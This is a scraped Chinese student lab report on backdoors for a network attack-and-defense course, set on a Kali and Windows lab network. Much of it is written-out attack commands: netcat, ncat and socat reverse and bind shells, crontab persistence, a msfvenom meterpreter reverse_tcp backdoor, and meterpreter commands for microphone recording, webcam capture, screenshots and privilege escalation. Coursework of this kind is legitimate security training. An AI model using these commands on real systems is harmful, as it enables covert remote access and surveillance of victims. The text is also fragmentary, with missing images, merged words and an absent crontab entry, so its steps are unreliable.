标签:参数说明 dem 官方网站 迭代 基本功 去除 inux 插入 info
ncat是一个底层工具,进行基本的TCP UDP数据收发。常被与其他工具结合使用,起到后门的作用。
使用ncat.exe程序监听本机的5334端口ncat.exe -l -p 5334
5334端口nc 192.168.115.130 5334 -e /bin/sh成功获得Kali的shell,如下图所示

ifconfig查看IP:ncat指令监听5303端口nc -l -p 5334Windows下,使用ncat.exe程序的-e选项项反向连接Kali主机的5334端口ncat.exe -e cmd.exe 192.168.56.101 5334Kali下可以看到Windows的命令提示,可以输入Windows命令
ncat传输数据5334端口:ncat.exe -l -p 53345334端口ncat 192.168.56.1建立连接之后,进行传输数据测试

ncat进行文件传输f_out中,ncat.exe -l 5318 > f_outnc 192.168.56.1 5334 < f_in连接建立成功,Win可以收到kali发来的文件

Meterpreter输出到哪个文件
crontab -e指令编辑一条定时任务,选择编辑器时选择"34",在底行插入,意思是在每个小时的第26分钟反向连接Windows主机的5334端口在 cmd中使用ls进行验证


socatsocat是ncat的增强版,它使用的格式是socat [options] <address> <address>,其中两个ddress是必选项,而options 是可选项。- ocat的基本功能就是建立两个双向的字节流,数据就在其间传输,参数``address```就是代表了其中的一个方向。所谓流,代表了数据的流向,而数据则可以有许多不同的类型,命令中也就相应需要许多选项对各种不同的类型数据流进行限定与说明。在操作->程序或脚本中选择你的socat.exe文件的路径,在添加参数一栏填写tcp-listen:5334 exec:cmd.exe,pty,stderr,这个命令的作用是把cmd.exe绑定到端口5334,同时把cmd.exe的stderr重定向到stdout上


在Kali环境下输入指令socat tcp:172.30.4.253:5334,这里的第一个参数-代表标准的输入输出,第二个流连接到Windows主机的5334端口,此时可以发现已经成功获得了一个cmd shell:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.101 LPORT=5334 -f exe > 20165334_backdoor.exe(IP为kali的IP)生成后门程序20165334_backdoor.exencat.exe -lv 5334 > 20165334_backdoor.exe查看连接状态nc 192.168.56.1 5334 < 20165334_backdoor.exe(此处的IP为Windows的IP)将生成的后门程序传送到Windows主机上

msfconsole指令进入msf控制台,使用监听模块,设置payload,设置反弹回连的IP和端口
20165334_backdoor此时Kali上已经获得了Windows主机的连接,并且得到了远程控制的shell:

record_mic指令可以截获一段音频webcam_snap指令可以使用摄像头进行拍照使用screenshot指令可以进行截屏


getuid指令查看当前用户,使用getsystem指令进行提权
(1)例举你能想到的一个后门进入到你系统中的可能方式?

ping结果发现Linux可以ping通windows但windows不能ping通linux,参考文章解决相关问题,做了以下修改。

2018-2019-2 20165334《网络对抗技术》Exp2 后门原理与实践
标签:参数说明 dem 官方网站 迭代 基本功 去除 inux 插入 info
原文地址:https://www.cnblogs.com/ltl123/p/10573918.html